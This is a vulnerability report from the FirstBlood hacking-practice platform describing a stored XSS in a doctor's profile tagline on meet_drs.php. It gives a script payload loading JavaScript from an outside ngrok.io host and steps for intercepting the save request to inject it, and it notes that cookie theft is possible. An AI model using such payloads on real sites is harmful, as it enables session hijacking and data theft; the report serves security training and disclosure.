FirstBlood-#1651 — Stored xss in doctors tagline
This issue was discovered on FirstBlood v3
On 2022-12-12, didsec Level 5 reported:
I have discovered a stored XSS vulnerability affecting the tagline
of a doctors profile on the meet_drs.php
page
Note:
if a photoUrl is not present then the tagline is ignored in the send request ``
Payload string
<script/src=//ngrok.io/payload.js?c=
payload.js contents
alert(document.domain)
To reproduce:
- Host the payload.js file on a server I used ngrok
- Login in to the
drpanel
and pick a doctor to modify
- Make any modifications you would like
- Click
Save information
and intercept the request
- Add
&photoUrl={relative link}&tagline=<script/src=//ngrok.io/payload.js?c=
-
Visit firstbloodhackers.com/meet_drs.php
and the xss will execute
Impact:
- The attacker could steal a user's cookies.
- The attacker can steal data from whoever views the page.
- Users can execute arbitrary JavaScript code in the context of other users.
P2 High
Endpoint: /meet_drs.php
Parameter: tagline
Payload: <script/src=//ngrok.io/payload.js?c=
FirstBlood ID: 70
Vulnerability Type: Stored XSS
Doctors can have taglines set however the tagline is vulnerable to stored XSS on meet_drs.php